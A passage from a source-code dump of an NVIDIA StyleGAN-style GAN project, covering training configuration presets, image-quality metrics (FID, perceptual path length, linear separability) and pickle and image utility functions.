dataset.max_label_size = 'full' # conditioned on full label #desc += '-cond1'; dataset.max_label_size = 1 # conditioned on first component of the label #desc += '-g4k'; grid.size = '4k' #desc += '-grpc'; grid.layout = 'row_per_class' # Config presets (choose one). #desc += '-preset-v1-1gpu'; submit_config.num_gpus = 1; D.mbstd_group_size = 16; sched.minibatch_base = 16; sched.minibatch_dict = {256: 14, 512: 6, 1024: 3}; sched.lod_training_kimg = 800; sched.lod_transition_kimg = 800; train.total_kimg = 19000 desc += '-preset-v2-1gpu'; submit_config.num_gpus = 1; sched.minibatch_base = 4; sched.minibatch_dict = {4: 128, 8: 128, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8, 512: 4}; sched.G_lrate_dict = {1024: 0.0015}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 #desc += '-preset-v2-2gpus'; submit_config.num_gpus = 2; sched.minibatch_base = 8; sched.minibatch_dict = {4: 256, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8}; sched.G_lrate_dict = {512: 0.0015, 1024: 0.002}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 #desc += '-preset-v2-4gpus'; submit_config.num_gpus = 4; sched.minibatch_base = 16; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16}; sched.G_lrate_dict = {256: 0.0015, 512: 0.002, 1024: 0.003}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 #desc += '-preset-v2-8gpus'; submit_config.num_gpus = 8; sched.minibatch_base = 32; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32}; sched.G_lrate_dict = {128: 0.0015, 256: 0.002, 512: 0.003, 1024: 0.003}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 # Numerical precision (choose one). desc += '-fp32'; sched.max_minibatch_per_gpu = {256: 16, 512: 8, 1024: 4} #desc += '-fp16'; G.dtype = 'float16'; D.dtype = 'float16'; G.pixelnorm_epsilon=1e-4; G_opt.use_loss_scaling = True; D_opt.use_loss_scaling = True; sched.max_minibatch_per_gpu = {512: 16, 1024: 8} # Disable individual features. #desc += '-nogrowing'; sched.lod_initial_resolution = 1024; sched.lod_training_kimg = 0; sched.lod_transition_kimg = 0; train.total_kimg = 10000 #desc += '-nopixelnorm'; G.use_pixelnorm = False #desc += '-nowscale'; G.use_wscale = False; D.use_wscale = False #desc += '-noleakyrelu'; G.use_leakyrelu = False #desc += '-nosmoothing'; train.G_smoothing_kimg = 0.0 #desc += '-norepeat'; train.minibatch_repeats = 1 #desc += '-noreset'; train.reset_opt_for_new_lod = False # Special modes. #desc += '-BENCHMARK'; sched.lod_initial_resolution = 4; sched.lod_training_kimg = 3; sched.lod_transition_kimg = 3; train.total_kimg = (8*2+1)*3; sched.tick_kimg_base = 1; sched.tick_kimg_dict = {}; train.image_snapshot_ticks = 1000; train.network_snapshot_ticks = 1000 #desc += '-BENCHMARK0'; sched.lod_initial_resolution = 1024; train.total_kimg = 10; sched.tick_kimg_base = 1; sched.tick_kimg_dict = {}; train.image_snapshot_ticks = 1000; train.network_snapshot_ticks = 1000 #desc += '-VERBOSE'; sched.tick_kimg_base = 1; sched.tick_kimg_dict = {}; train.image_snapshot_ticks = 1; train.network_snapshot_ticks = 100 #desc += '-GRAPH'; train.save_tf_graph = True #desc += '-HIST'; train.save_weight_histograms = True #---------------------------------------------------------------------------- # Main entry point for training. # Calls the function indicated by 'train' using the selected options. def main(): kwargs = EasyDict(train) kwargs.update(G_args=G, D_args=D, G_opt_args=G_opt, D_opt_args=D_opt, G_loss_args=G_loss, D_loss_args=D_loss) kwargs.update(dataset_args=dataset, sched_args=sched, grid_args=grid, metric_arg_list=metrics, tf_config=tf_config) kwargs.submit_config = copy.deepcopy(submit_config) kwargs.submit_config.run_dir_root = dnnlib.submission.submit.get_template_from_path(config.result_dir) kwargs.submit_config.run_dir_ignore += config.run_dir_ignore kwargs.submit_config.run_desc = desc dnnlib.submit_run(**kwargs) #---------------------------------------------------------------------------- if __name__ == "__main__": main() #---------------------------------------------------------------------------- File: metrics/linear_separability.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Linear Separability (LS).""" from collections import defaultdict import numpy as np import sklearn.svm import tensorflow as tf import dnnlib.tflib as tflib from metrics import metric_base from training import misc #---------------------------------------------------------------------------- classifier_urls = [ 'https://drive.google.com/uc?id=1Q5-AI6TwWhCVM7Muu4tBM7rp5nG_gmCX', # celebahq-classifier-00-male.pkl 'https://drive.google.com/uc?id=1Q5c6HE__ReW2W8qYAXpao68V1ryuisGo', # celebahq-classifier-01-smiling.pkl 'https://drive.google.com/uc?id=1Q7738mgWTljPOJQrZtSMLxzShEhrvVsU', # celebahq-classifier-02-attractive.pkl 'https://drive.google.com/uc?id=1QBv2Mxe7ZLvOv1YBTLq-T4DS3HjmXV0o', # celebahq-classifier-03-wavy-hair.pkl 'https://drive.google.com/uc?id=1QIvKTrkYpUrdA45nf7pspwAqXDwWOLhV', # celebahq-classifier-04-young.pkl 'https://drive.google.com/uc?id=1QJPH5rW7MbIjFUdZT7vRYfyUjNYDl4_L', # celebahq-classifier-05-5-o-clock-shadow.pkl 'https://drive.google.com/uc?id=1QPZXSYf6cptQnApWS_T83sqFMun3rULY', # celebahq-classifier-06-arched-eyebrows.pkl 'https://drive.google.com/uc?id=1QPgoAZRqINXk_PFoQ6NwMmiJfxc5d2Pg', # celebahq-classifier-07-bags-under-eyes.pkl 'https://drive.google.com/uc?id=1QQPQgxgI6wrMWNyxFyTLSgMVZmRr1oO7', # celebahq-classifier-08-bald.pkl 'https://drive.google.com/uc?id=1QcSphAmV62UrCIqhMGgcIlZfoe8hfWaF', # celebahq-classifier-09-bangs.pkl 'https://drive.google.com/uc?id=1QdWTVwljClTFrrrcZnPuPOR4mEuz7jGh', # celebahq-classifier-10-big-lips.pkl 'https://drive.google.com/uc?id=1QgvEWEtr2mS4yj1b_Y3WKe6cLWL3LYmK', # celebahq-classifier-11-big-nose.pkl 'https://drive.google.com/uc?id=1QidfMk9FOKgmUUIziTCeo8t-kTGwcT18', # celebahq-classifier-12-black-hair.pkl 'https://drive.google.com/uc?id=1QthrJt-wY31GPtV8SbnZQZ0_UEdhasHO', # celebahq-classifier-13-blond-hair.pkl 'https://drive.google.com/uc?id=1QvCAkXxdYT4sIwCzYDnCL9Nb5TDYUxGW', # celebahq-classifier-14-blurry.pkl 'https://drive.google.com/uc?id=1QvLWuwSuWI9Ln8cpxSGHIciUsnmaw8L0', # celebahq-classifier-15-brown-hair.pkl 'https://drive.google.com/uc?id=1QxW6THPI2fqDoiFEMaV6pWWHhKI_OoA7', # celebahq-classifier-16-bushy-eyebrows.pkl 'https://drive.google.com/uc?id=1R71xKw8oTW2IHyqmRDChhTBkW9wq4N9v', # celebahq-classifier-17-chubby.pkl 'https://drive.google.com/uc?id=1RDn_fiLfEGbTc7JjazRXuAxJpr-4Pl67', # celebahq-classifier-18-double-chin.pkl 'https://drive.google.com/uc?id=1RGBuwXbaz5052bM4VFvaSJaqNvVM4_cI', # celebahq-classifier-19-eyeglasses.pkl 'https://drive.google.com/uc?id=1RIxOiWxDpUwhB-9HzDkbkLegkd7euRU9', # celebahq-classifier-20-goatee.pkl 'https://drive.google.com/uc?id=1RPaNiEnJODdr-fwXhUFdoSQLFFZC7rC-', # celebahq-classifier-21-gray-hair.pkl 'https://drive.google.com/uc?id=1RQH8lPSwOI2K_9XQCZ2Ktz7xm46o80ep', # celebahq-classifier-22-heavy-makeup.pkl 'https://drive.google.com/uc?id=1RXZM61xCzlwUZKq-X7QhxOg0D2telPow', # celebahq-classifier-23-high-cheekbones.pkl 'https://drive.google.com/uc?id=1RgASVHW8EWMyOCiRb5fsUijFu-HfxONM', # celebahq-classifier-24-mouth-slightly-open.pkl 'https://drive.google.com/uc?id=1RkC8JLqLosWMaRne3DARRgolhbtg_wnr', # celebahq-classifier-25-mustache.pkl 'https://drive.google.com/uc?id=1RqtbtFT2EuwpGTqsTYJDyXdnDsFCPtLO', # celebahq-classifier-26-narrow-eyes.pkl 'https://drive.google.com/uc?id=1Rs7hU-re8bBMeRHR-fKgMbjPh-RIbrsh', # celebahq-classifier-27-no-beard.pkl 'https://drive.google.com/uc?id=1RynDJQWdGOAGffmkPVCrLJqy_fciPF9E', # celebahq-classifier-28-oval-face.pkl 'https://drive.google.com/uc?id=1S0TZ_Hdv5cb06NDaCD8NqVfKy7MuXZsN', # celebahq-classifier-29-pale-skin.pkl 'https://drive.google.com/uc?id=1S3JPhZH2B4gVZZYCWkxoRP11q09PjCkA', # celebahq-classifier-30-pointy-nose.pkl 'https://drive.google.com/uc?id=1S3pQuUz-Jiywq_euhsfezWfGkfzLZ87W', # celebahq-classifier-31-receding-hairline.pkl 'https://drive.google.com/uc?id=1S6nyIl_SEI3M4l748xEdTV2vymB_-lrY', # celebahq-classifier-32-rosy-cheeks.pkl 'https://drive.google.com/uc?id=1S9P5WCi3GYIBPVYiPTWygrYIUSIKGxbU', # celebahq-classifier-33-sideburns.pkl 'https://drive.google.com/uc?id=1SANviG-pp08n7AFpE9wrARzozPIlbfCH', # celebahq-classifier-34-straight-hair.pkl 'https://drive.google.com/uc?id=1SArgyMl6_z7P7coAuArqUC2zbmckecEY', # celebahq-classifier-35-wearing-earrings.pkl 'https://drive.google.com/uc?id=1SC5JjS5J-J4zXFO9Vk2ZU2DT82TZUza_', # celebahq-classifier-36-wearing-hat.pkl 'https://drive.google.com/uc?id=1SDAQWz03HGiu0MSOKyn7gvrp3wdIGoj-', # celebahq-classifier-37-wearing-lipstick.pkl 'https://drive.google.com/uc?id=1SEtrVK-TQUC0XeGkBE9y7L8VXfbchyKX', # celebahq-classifier-38-wearing-necklace.pkl 'https://drive.google.com/uc?id=1SF_mJIdyGINXoV-I6IAxHB_k5dxiF6M-', # celebahq-classifier-39-wearing-necktie.pkl ] #---------------------------------------------------------------------------- def prob_normalize(p): p = np.asarray(p).astype(np.float32) assert len(p.shape) == 2 return p / np.sum(p) def mutual_information(p): p = prob_normalize(p) px = np.sum(p, axis=1) py = np.sum(p, axis=0) result = 0.0 for x in range(p.shape[0]): p_x = px[x] for y in range(p.shape[1]): p_xy = p[x][y] p_y = py[y] if p_xy > 0.0: result += p_xy * np.log2(p_xy / (p_x * p_y)) # get bits as output return result def entropy(p): p = prob_normalize(p) result = 0.0 for x in range(p.shape[0]): for y in range(p.shape[1]): p_xy = p[x][y] if p_xy > 0.0: result -= p_xy * np.log2(p_xy) return result def conditional_entropy(p): # H(Y|X) where X corresponds to axis 0, Y to axis 1 # i.e., How many bits of additional information are needed to where we are on axis 1 if we know where we are on axis 0? p = prob_normalize(p) y = np.sum(p, axis=0, keepdims=True) # marginalize to calculate H(Y) return max(0.0, entropy(y) - mutual_information(p)) # can slip just below 0 due to FP inaccuracies, clean those up. #---------------------------------------------------------------------------- class LS(metric_base.MetricBase): def __init__(self, num_samples, num_keep, attrib_indices, minibatch_per_gpu, **kwargs): assert num_keep <= num_samples super().__init__(**kwargs) self.num_samples = num_samples self.num_keep = num_keep self.attrib_indices = attrib_indices self.minibatch_per_gpu = minibatch_per_gpu def _evaluate(self, Gs, num_gpus): minibatch_size = num_gpus * self.minibatch_per_gpu # Construct TensorFlow graph for each GPU. result_expr = [] for gpu_idx in range(num_gpus): with tf.device('/gpu:%d' % gpu_idx): Gs_clone = Gs.clone() # Generate images. latents = tf.random_normal([self.minibatch_per_gpu] + Gs_clone.input_shape[1:]) dlatents = Gs_clone.components.mapping.get_output_for(latents, None, is_validation=True) images = Gs_clone.components.synthesis.get_output_for(dlatents, is_validation=True, randomize_noise=True) # Downsample to 256x256. The attribute classifiers were built for 256x256. if images.shape[2] > 256: factor = images.shape[2] // 256 images = tf.reshape(images, [-1, images.shape[1], images.shape[2] // factor, factor, images.shape[3] // factor, factor]) images = tf.reduce_mean(images, axis=[3, 5]) # Run classifier for each attribute. result_dict = dict(latents=latents, dlatents=dlatents[:,-1]) for attrib_idx in self.attrib_indices: classifier = misc.load_pkl(classifier_urls[attrib_idx]) logits = classifier.get_output_for(images, None) predictions = tf.nn.softmax(tf.concat([logits, -logits], axis=1)) result_dict[attrib_idx] = predictions result_expr.append(result_dict) # Sampling loop. results = [] for _ in range(0, self.num_samples, minibatch_size): results += tflib.run(result_expr) results = {key: np.concatenate([value[key] for value in results], axis=0) for key in results[0].keys()} # Calculate conditional entropy for each attribute. conditional_entropies = defaultdict(list) for attrib_idx in self.attrib_indices: # Prune the least confident samples. pruned_indices = list(range(self.num_samples)) pruned_indices = sorted(pruned_indices, key=lambda i: -np.max(results[attrib_idx][i])) pruned_indices = pruned_indices[:self.num_keep] # Fit SVM to the remaining samples. svm_targets = np.argmax(results[attrib_idx][pruned_indices], axis=1) for space in ['latents', 'dlatents']: svm_inputs = results[space][pruned_indices] try: svm = sklearn.svm.LinearSVC() svm.fit(svm_inputs, svm_targets) svm.score(svm_inputs, svm_targets) svm_outputs = svm.predict(svm_inputs) except: svm_outputs = svm_targets # assume perfect prediction # Calculate conditional entropy. p = [[np.mean([case == (row, col) for case in zip(svm_outputs, svm_targets)]) for col in (0, 1)] for row in (0, 1)] conditional_entropies[space].append(conditional_entropy(p)) # Calculate separability scores. scores = {key: 2**np.sum(values) for key, values in conditional_entropies.items()} self._report_result(scores['latents'], suffix='_z') self._report_result(scores['dlatents'], suffix='_w') #---------------------------------------------------------------------------- File: metrics/frechet_inception_distance.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Frechet Inception Distance (FID).""" import os import numpy as np import scipy import tensorflow as tf import dnnlib.tflib as tflib from metrics import metric_base from training import misc #---------------------------------------------------------------------------- class FID(metric_base.MetricBase): def __init__(self, num_images, minibatch_per_gpu, **kwargs): super().__init__(**kwargs) self.num_images = num_images self.minibatch_per_gpu = minibatch_per_gpu def _evaluate(self, Gs, num_gpus): minibatch_size = num_gpus * self.minibatch_per_gpu inception = misc.load_pkl('https://drive.google.com/uc?id=1MzTY44rLToO5APn8TZmfR7_ENSe5aZUn') # inception_v3_features.pkl activations = np.empty([self.num_images, inception.output_shape[1]], dtype=np.float32) # Calculate statistics for reals. cache_file = self._get_cache_file_for_reals(num_images=self.num_images) os.makedirs(os.path.dirname(cache_file), exist_ok=True) if os.path.isfile(cache_file): mu_real, sigma_real = misc.load_pkl(cache_file) else: for idx, images in enumerate(self._iterate_reals(minibatch_size=minibatch_size)): begin = idx * minibatch_size end = min(begin + minibatch_size, self.num_images) activations[begin:end] = inception.run(images[:end-begin], num_gpus=num_gpus, assume_frozen=True) if end == self.num_images: break mu_real = np.mean(activations, axis=0) sigma_real = np.cov(activations, rowvar=False) misc.save_pkl((mu_real, sigma_real), cache_file) # Construct TensorFlow graph. result_expr = [] for gpu_idx in range(num_gpus): with tf.device('/gpu:%d' % gpu_idx): Gs_clone = Gs.clone() inception_clone = inception.clone() latents = tf.random_normal([self.minibatch_per_gpu] + Gs_clone.input_shape[1:]) images = Gs_clone.get_output_for(latents, None, is_validation=True, randomize_noise=True) images = tflib.convert_images_to_uint8(images) result_expr.append(inception_clone.get_output_for(images)) # Calculate statistics for fakes. for begin in range(0, self.num_images, minibatch_size): end = min(begin + minibatch_size, self.num_images) activations[begin:end] = np.concatenate(tflib.run(result_expr), axis=0)[:end-begin] mu_fake = np.mean(activations, axis=0) sigma_fake = np.cov(activations, rowvar=False) # Calculate FID. m = np.square(mu_fake - mu_real).sum() s, _ = scipy.linalg.sqrtm(np.dot(sigma_fake, sigma_real), disp=False) # pylint: disable=no-member dist = m + np.trace(sigma_fake + sigma_real - 2*s) self._report_result(np.real(dist)) #---------------------------------------------------------------------------- File: metrics/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. # empty File: metrics/perceptual_path_length.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Perceptual Path Length (PPL).""" import numpy as np import tensorflow as tf import dnnlib.tflib as tflib from metrics import metric_base from training import misc #---------------------------------------------------------------------------- # Normalize batch of vectors. def normalize(v): return v / tf.sqrt(tf.reduce_sum(tf.square(v), axis=-1, keepdims=True)) # Spherical interpolation of a batch of vectors. def slerp(a, b, t): a = normalize(a) b = normalize(b) d = tf.reduce_sum(a * b, axis=-1, keepdims=True) p = t * tf.math.acos(d) c = normalize(b - d * a) d = a * tf.math.cos(p) + c * tf.math.sin(p) return normalize(d) #---------------------------------------------------------------------------- class PPL(metric_base.MetricBase): def __init__(self, num_samples, epsilon, space, sampling, minibatch_per_gpu, **kwargs): assert space in ['z', 'w'] assert sampling in ['full', 'end'] super().__init__(**kwargs) self.num_samples = num_samples self.epsilon = epsilon self.space = space self.sampling = sampling self.minibatch_per_gpu = minibatch_per_gpu def _evaluate(self, Gs, num_gpus): minibatch_size = num_gpus * self.minibatch_per_gpu # Construct TensorFlow graph. distance_expr = [] for gpu_idx in range(num_gpus): with tf.device('/gpu:%d' % gpu_idx): Gs_clone = Gs.clone() noise_vars = [var for name, var in Gs_clone.components.synthesis.vars.items() if name.startswith('noise')] # Generate random latents and interpolation t-values. lat_t01 = tf.random_normal([self.minibatch_per_gpu * 2] + Gs_clone.input_shape[1:]) lerp_t = tf.random_uniform([self.minibatch_per_gpu], 0.0, 1.0 if self.sampling == 'full' else 0.0) # Interpolate in W or Z. if self.space == 'w': dlat_t01 = Gs_clone.components.mapping.get_output_for(lat_t01, None, is_validation=True) dlat_t0, dlat_t1 = dlat_t01[0::2], dlat_t01[1::2] dlat_e0 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis]) dlat_e1 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis] + self.epsilon) dlat_e01 = tf.reshape(tf.stack([dlat_e0, dlat_e1], axis=1), dlat_t01.shape) else: # space == 'z' lat_t0, lat_t1 = lat_t01[0::2], lat_t01[1::2] lat_e0 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis]) lat_e1 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis] + self.epsilon) lat_e01 = tf.reshape(tf.stack([lat_e0, lat_e1], axis=1), lat_t01.shape) dlat_e01 = Gs_clone.components.mapping.get_output_for(lat_e01, None, is_validation=True) # Synthesize images. with tf.control_dependencies([var.initializer for var in noise_vars]): # use same noise inputs for the entire minibatch images = Gs_clone.components.synthesis.get_output_for(dlat_e01, is_validation=True, randomize_noise=False) # Crop only the face region. c = int(images.shape[2] // 8) images = images[:, :, c*3 : c*7, c*2 : c*6] # Downsample image to 256x256 if it's larger than that. VGG was built for 224x224 images. if images.shape[2] > 256: factor = images.shape[2] // 256 images = tf.reshape(images, [-1, images.shape[1], images.shape[2] // factor, factor, images.shape[3] // factor, factor]) images = tf.reduce_mean(images, axis=[3,5]) # Scale dynamic range from [-1,1] to [0,255] for VGG. images = (images + 1) * (255 / 2) # Evaluate perceptual distance. img_e0, img_e1 = images[0::2], images[1::2] distance_measure = misc.load_pkl('https://drive.google.com/uc?id=1N2-m9qszOeVC9Tq77WxsLnuWwOedQiD2') # vgg16_zhang_perceptual.pkl distance_expr.append(distance_measure.get_output_for(img_e0, img_e1) * (1 / self.epsilon**2)) # Sampling loop. all_distances = [] for _ in range(0, self.num_samples, minibatch_size): all_distances += tflib.run(distance_expr) all_distances = np.concatenate(all_distances, axis=0) # Reject outliers. lo = np.percentile(all_distances, 1, interpolation='lower') hi = np.percentile(all_distances, 99, interpolation='higher') filtered_distances = np.extract(np.logical_and(lo <= all_distances, all_distances <= hi), all_distances) self._report_result(np.mean(filtered_distances)) #---------------------------------------------------------------------------- File: metrics/metric_base.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Common definitions for GAN metrics.""" import os import time import hashlib import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib import config from training import misc from training import dataset #---------------------------------------------------------------------------- # Standard metrics. fid50k = dnnlib.EasyDict(func_name='metrics.frechet_inception_distance.FID', name='fid50k', num_images=50000, minibatch_per_gpu=8) ppl_zfull = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_zfull', num_samples=100000, epsilon=1e-4, space='z', sampling='full', minibatch_per_gpu=16) ppl_wfull = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_wfull', num_samples=100000, epsilon=1e-4, space='w', sampling='full', minibatch_per_gpu=16) ppl_zend = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_zend', num_samples=100000, epsilon=1e-4, space='z', sampling='end', minibatch_per_gpu=16) ppl_wend = dnnlib.EasyDict(func_name='metrics.perceptual_path_length.PPL', name='ppl_wend', num_samples=100000, epsilon=1e-4, space='w', sampling='end', minibatch_per_gpu=16) ls = dnnlib.EasyDict(func_name='metrics.linear_separability.LS', name='ls', num_samples=200000, num_keep=100000, attrib_indices=range(40), minibatch_per_gpu=4) dummy = dnnlib.EasyDict(func_name='metrics.metric_base.DummyMetric', name='dummy') # for debugging #---------------------------------------------------------------------------- # Base class for metrics. class MetricBase: def __init__(self, name): self.name = name self._network_pkl = None self._dataset_args = None self._mirror_augment = None self._results = [] self._eval_time = None def run(self, network_pkl, run_dir=None, dataset_args=None, mirror_augment=None, num_gpus=1, tf_config=None, log_results=True): self._network_pkl = network_pkl self._dataset_args = dataset_args self._mirror_augment = mirror_augment self._results = [] if (dataset_args is None or mirror_augment is None) and run_dir is not None: run_config = misc.parse_config_for_previous_run(run_dir) self._dataset_args = dict(run_config['dataset']) self._dataset_args['shuffle_mb'] = 0 self._mirror_augment = run_config['train'].get('mirror_augment', False) time_begin = time.time() with tf.Graph().as_default(), tflib.create_session(tf_config).as_default(): # pylint: disable=not-context-manager _G, _D, Gs = misc.load_pkl(self._network_pkl) self._evaluate(Gs, num_gpus=num_gpus) self._eval_time = time.time() - time_begin if log_results: result_str = self.get_result_str() if run_dir is not None: log = os.path.join(run_dir, 'metric-%s.txt' % self.name) with dnnlib.util.Logger(log, 'a'): print(result_str) else: print(result_str) def get_result_str(self): network_name = os.path.splitext(os.path.basename(self._network_pkl))[0] if len(network_name) > 29: network_name = '...' + network_name[-26:] result_str = '%-30s' % network_name result_str += ' time %-12s' % dnnlib.util.format_time(self._eval_time) for res in self._results: result_str += ' ' + self.name + res.suffix + ' ' result_str += res.fmt % res.value return result_str def update_autosummaries(self): for res in self._results: tflib.autosummary.autosummary('Metrics/' + self.name + res.suffix, res.value) def _evaluate(self, Gs, num_gpus): raise NotImplementedError # to be overridden by subclasses def _report_result(self, value, suffix='', fmt='%-10.4f'): self._results += [dnnlib.EasyDict(value=value, suffix=suffix, fmt=fmt)] def _get_cache_file_for_reals(self, extension='pkl', **kwargs): all_args = dnnlib.EasyDict(metric_name=self.name, mirror_augment=self._mirror_augment) all_args.update(self._dataset_args) all_args.update(kwargs) md5 = hashlib.md5(repr(sorted(all_args.items())).encode('utf-8')) dataset_name = self._dataset_args['tfrecord_dir'].replace('\\', '/').split('/')[-1] return os.path.join(config.cache_dir, '%s-%s-%s.%s' % (md5.hexdigest(), self.name, dataset_name, extension)) def _iterate_reals(self, minibatch_size): dataset_obj = dataset.load_dataset(data_dir=config.data_dir, **self._dataset_args) while True: images, _labels = dataset_obj.get_minibatch_np(minibatch_size) if self._mirror_augment: images = misc.apply_mirror_augment(images) yield images def _iterate_fakes(self, Gs, minibatch_size, num_gpus): while True: latents = np.random.randn(minibatch_size, *Gs.input_shape[1:]) fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True) images = Gs.run(latents, None, output_transform=fmt, is_validation=True, num_gpus=num_gpus, assume_frozen=True) yield images #---------------------------------------------------------------------------- # Group of multiple metrics. class MetricGroup: def __init__(self, metric_kwarg_list): self.metrics = [dnnlib.util.call_func_by_name(**kwargs) for kwargs in metric_kwarg_list] def run(self, *args, **kwargs): for metric in self.metrics: metric.run(*args, **kwargs) def get_result_str(self): return ' '.join(metric.get_result_str() for metric in self.metrics) def update_autosummaries(self): for metric in self.metrics: metric.update_autosummaries() #---------------------------------------------------------------------------- # Dummy metric for debugging purposes. class DummyMetric(MetricBase): def _evaluate(self, Gs, num_gpus): _ = Gs, num_gpus self._report_result(0.0) #---------------------------------------------------------------------------- File: training/misc.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Miscellaneous utility functions.""" import os import glob import pickle import re import numpy as np from collections import defaultdict import PIL.Image import dnnlib import config from training import dataset #---------------------------------------------------------------------------- # Convenience wrappers for pickle that are able to load data produced by # older versions of the code, and from external URLs. def open_file_or_url(file_or_url): if dnnlib.util.is_url(file_or_url): return dnnlib.util.open_url(file_or_url, cache_dir=config.cache_dir) return open(file_or_url, 'rb') def load_pkl(file_or_url): with open_file_or_url(file_or_url) as file: return pickle.load(file, encoding='latin1') def save_pkl(obj, filename): with open(filename, 'wb') as file: pickle.dump(obj, file, protocol=pickle.HIGHEST_PROTOCOL) #---------------------------------------------------------------------------- # Image utils. def adjust_dynamic_range(data, drange_in, drange_out): if drange_in != drange_out: scale = (np.float32(drange_out[1]) - np.float32(drange_out[0])) / (np.float32(drange_in[1]) - np.float32(drange_in[0])) bias = (np.float32(drange_out[0]) - np.float32(drange_in[0]) * scale) data = data * scale + bias return data def create_image_grid(images, grid_size=None): assert images.ndim == 3 or images.ndim == 4 num, img_w, img_h = images.shape[0], images.shape[-1], images.shape[-2] if grid_size is not None: grid_w, grid_h = tuple(grid_size) else: grid_w = max(int(np.ceil(np.sqrt(num))), 1) grid_h = max((num - 1) // grid_w + 1, 1) grid = np.zeros(list(images.shape[1:-2]) + [grid_h * img_h, grid_w * img_w], dtype=images.dtype) for idx in range(num): x = (idx % grid_w) * img_w y = (idx // grid_w) * img_h grid[..., y : y + img_h, x : x + img_w] = images[idx] return grid def convert_to_pil_image(image, drange=[0,1]): assert image.ndim == 2 or image.ndim == 3 if image.ndim == 3: if image.shape[0] == 1: image = image[0] # grayscale CHW => HW else: image = image.transpose(1, 2, 0) # CHW -> HWC image = adjust_dynamic_range(image, drange, [0,255]) image = np.rint(image).clip(0, 255).astype(np.uint8) fmt = 'RGB' if image.ndim == 3 else 'L' return PIL.Image.fromarray(image, fmt) def save_image(image, filename, drange=[0,1], quality=95): img = convert_to_pil_image(image, drange) if '.jpg' in filename: img.save(filename,"JPEG", quality=quality, optimize=True) else: img.save(filename) def save_image_grid(images, filename, drange=[0,1], grid_size=None): convert_to_pil_image(create_image_grid(images, grid_size), drange).save(filename) #---------------------------------------------------------------------------- # Locating results. def locate_run_dir(run_id_or_run_dir): if isinstance(run_id_or_run_dir, str): if os.path.isdir(run_id_or_run_dir): return run_id_or_run_dir converted = dnnlib.submission.submit.convert_path(run_id_or_run_dir) if os.path.isdir(converted): return converted run_dir_pattern = re.compile('^0*%s-' % str(run_id_or_run_dir)) for search_dir in ['']: full_search_dir = config.result_dir if search_dir == '' else os.path.normpath(os.path.join(config.result_dir, search_dir)) run_dir = os.path.join(full_search_dir, str(run_id_or_run_dir)) if os.path.isdir(run_dir): return run_dir run_dirs = sorted(glob.glob(os.path.join(full_search_dir, '*'))) run_dirs = [run_dir for run_dir in run_dirs if run_dir_pattern.match(os.path.basename(run_dir))] run_dirs = [run_dir for run_dir in run_dirs if os.path.isdir(run_dir)] if len(run_dirs) == 1: return run_dirs[0] raise IOError('Cannot locate result subdir for run', run_id_or_run_dir) def list_network_pkls(run_id_or_run_dir, include_final=True): run_dir = locate_run_dir(run_id_or_run_dir) pkls = sorted(glob.glob(os.path.join(run_dir, 'network-*.pkl'))) if len(pkls) >= 1 and os.path.basename(pkls[0]) == 'network-final.pkl': if include_final: pkls.append(pkls[0]) del pkls[0] return pkls def locate_network_pkl(run_id_or_run_dir_or_network_pkl, snapshot_or_network_pkl=None): for candidate in [snapshot_or_network_pkl, run_id_or_run_dir_or_network_pkl]: if isinstance(candidate, str): if os.path.isfile(candidate): return candidate converted = dnnlib.submission.submit.convert_path(candidate) if os.path.isfile(converted): return converted pkls = list_network_pkls(run_id_or_run_dir_or_network_pkl) if len(pkls) >= 1 and snapshot_or_network_pkl is None: return pkls[-1] for pkl in pkls: try: name = os.path.splitext(os.path.basename(pkl))[0] number = int(name.split('-')[-1]) if number == snapshot_or_network_pkl: return pkl except ValueError: pass except IndexError: pass raise IOError('Cannot locate network pkl for snapshot', snapshot_or_network_pkl) def 